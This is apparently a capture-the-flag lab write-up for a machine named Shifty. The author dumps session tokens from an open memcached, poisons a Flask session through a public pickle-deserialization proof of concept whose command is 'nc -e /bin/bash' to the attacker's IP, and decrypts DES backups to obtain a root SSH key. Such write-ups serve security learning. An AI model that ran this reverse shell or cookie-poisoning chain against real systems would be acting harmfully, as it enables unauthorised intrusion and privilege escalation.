Shifty
Gaining Access
Nmap scan:
$ nmap -p- --min-rate 4000 192.168.202.59
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-06 21:57 +08
Nmap scan report for 192.168.202.59
Host is up (0.17s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
53/tcp closed domain
80/tcp open http
5000/tcp open upnp
11211/tcp open memcache
Memcache was open, of all things. I did a detailed nmap
scan as well:
$ sudo nmap -p 80,5000,11211 -sC -sV --min-rate 4000 192.168.202.59
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-06 21:58 +08
Nmap scan report for 192.168.202.59
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.10.3
|_http-generator: Gatsby 2.22.15
|_http-server-header: nginx/1.10.3
|_http-title: Gatsby + Netlify CMS Starter
5000/tcp open http Werkzeug httpd 1.0.1 (Python 3.5.3)
|_http-server-header: Werkzeug/1.0.1 Python/3.5.3
|_http-title: Hello, world!
11211/tcp open memcached Memcached 1.4.33 (uptime 150 seconds)
Interesting.
Web + Memcache Enum
Port 80 looked rather static:

There was no public exploit for this software either, so let's move on. Port 5000 looked way more promising:

We can login, and there's no additional functionality with this website. Viewing the requests, we can see that the login just assigned us a token:

Moving to Memcache, we can dump it using memcdump
. We instantly get loads of tokens:
$ memcdump --servers=192.168.202.59
<TRUNCATED>
session:8245fa94-7b27-4d99-a1c3-18a9f9db8e54
session:e90dd194-0be7-41f5-9362-a96431bea058
session:d5b40159-2bc4-4b57-91ae-2839ff3b040e
session:5cd631b0-49ba-4059-aae8-5dbae44f7c43
The last one was the same as above. I tried replacing the cookie within the request:
GET /admin HTTP/1.1
Host: 192.168.202.59:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.202.59:5000/login
Connection: close
Cookie: session=hellothere
Upgrade-Insecure-Requests: 1
Interestingly, this cookie is stored in Memcached, indicating there's no cookie sanitisation there. Perhaps this could be poisoned?

Pickling RCE
I googled 'memcache cookie poisoning exploit' and looked at all the results. This repo was one of them:
It looked exactly like what I needed. So I tested it after resetting the VPN and the machine.
$ python3 cve-2021-33026_PoC.py --rhost '192.168.202.59' --rport '5000' --cmd 'nc -e /bin/bash 192.168.45.179 80' --cookie 'session:session=5cd631b0-49ba-4059-aae8-5dbae44f7c43'
____ ___ ____ _ ___ _____
| _ \_ _/ ___| |/ / | | ____|
| |_) | | | | ' /| | | _| _____
| __/| | |___| . \| |___| |___ |_____|
|_| |___\____|_|\_\_____|_____|
__ __ _____ __ __ ____ _ ____ _ _ _____ ____
| \/ | ____| \/ |/ ___| / \ / ___| | | | ____| _ \
| |\/| | _| | |\/| | | / _ \| | | |_| | _| | | | |
| | | | |___| | | | |___ / ___ \ |___| _ | |___| |_| |
|_| |_|_____|_| |_|\____/_/ \_\____|_| |_|_____|____/
____ ___ ___ ____ ___ _ _ ___ _ _ ____
| _ \ / _ \_ _/ ___| / _ \| \ | |_ _| \ | |/ ___|
| |_) | | | | |\___ \| | | | \| || || \| | | _
| __/| |_| | | ___) | |_| | |\ || || |\ | |_| |
|_| \___/___|____/ \___/|_| \_|___|_| \_|\____|
We would get a shell on our listener port:

Privilege Escalation
Encrypted Files -> Root SSH
There was a backup.py
file within /opt/backups
:
import sys
import os
import hashlib
from des import des, CBC, PAD_PKCS5
def backup(name, file):
dest_dir = os.path.dirname(os.path.realpath(__file__)) + '/data'
dest_name = hashlib.sha224(name.encode('utf-8')).hexdigest()
with open('{}/{}'.format(dest_dir, dest_name), 'wb') as dest:
data = file.read()
k = des(b"87629ae8", CBC, b"\0\0\0\0\0\0\0\0", pad=None, padmode=PAD_PKCS5)
cipertext = k.encrypt(data)
dest.write(cipertext)
if __name__ == '__main__':
if len(sys.argv) < 2:
print('Usage: {} <file>'.format(sys.argv[0]))
FILENAME = sys.argv[1]
FILENAME = os.path.abspath(FILENAME)
print('Backing up "{}"'.format(FILENAME))
f = None
try:
f = open(FILENAME, 'rb')
backup(FILENAME, f)
except Exception as e:
print('Could not open {}'.format(FILENAME))
print(e)
finally:
if f:
f.close()
In the data
directory, there's also loads of encrypted files:
jerry@shifty:/opt/backups/data$ ls
0317ce62a75684cf0fcf8452a7fe5e5e919d1b730644bf16a304a919
11e3e83c5ea13aaed3b3ceb5edd72b9431ebc6ec2c447d412a0b7c7c
1a171f6f6491d3e4ca9cc0ca15a6c508c8815f6e29004bb29c0724d5
1cb607653518c3b1f08b1341322ead36dd8f93c3d2bfa23916fe28bd
1fd8c1281b186594d3d49f38cded4ce40faf862e9d409eb2a3a201cf
25a74de564e2aa81fbb8682f3fef798deda63f4cca65fd58901caecb
31328fa57f5c504df041f7f4f45498c766c0d12c33f78f33cff66bca
3fa4dcd297e960dc9e875437c67e7817356c487f57f828453756a2cc
403c9401a0224bd4f483dedb33ed0bf37fbd93881783ea0e600a49ff
5b1c7de10787e87d4d868457b7bf828154f1d02f653f2b57bce17abc
65895ecf8b82b9fa742e8fabde0fd7e60f1258a9e7ba3c1e9367a3e0
7297aeb420d0530ccb52dcb7f905ecc8deffefc32d02691561a9172e
7824132f0f0cc6da1dce3763d50c38c2941d07f9648e34c6c9b9ccf8
8cd58cbefd50ef93f1a3b173456f9b6a09a7318ada378c3a49a980f2
9038291aaa6b222363fc78837b934d1e2f96bb7cfe11fd3d73149e72
92e8127d493e205bfbd8a9c0dd165da2154768cebafa1c752d9bf0dc
dd533e5634f95c6d86a4f37f01453f5326c80e58b8a01f0a4222c011
dfe0444a971a789bb405c54c270ae25460f5699319aad697c7fd35ee
f166b490169e7de5795a09305837198579daad4694e233d49b126d91
I made a copy of all these files within my home directory, and began decrypting it using openssl
. From the python script and based on the documentation for des
, the key would be 87629ae8
and the IV is all null bytes.
Since the key is interpreted as a bytes type object, we need to convert it to hex, which would give 3837363239616538
.
Then, we can decrypt the files:
jerry@shifty:~/backup$ openssl enc -d -des-cbc -K 3837363239616538 -iv "0000000000000000" -in 3fa4dcd297e960dc9e875437c67e7817356c487f57f828453756a2cc -out decrypt
Then, we can bulk decrypt all of these files using a bash
for loop:
for FILE in *; do openssl enc -d -des-cbc -K 3837363239616538 -iv "0000000000000000" -in $FILE -out decrypt$FILE; rm $FILE; done
Then, we can read all of the files. Within the decrypted files, there was a SSH private key:

Using this, we can ssh
in as root
:

Rooted!
Last updated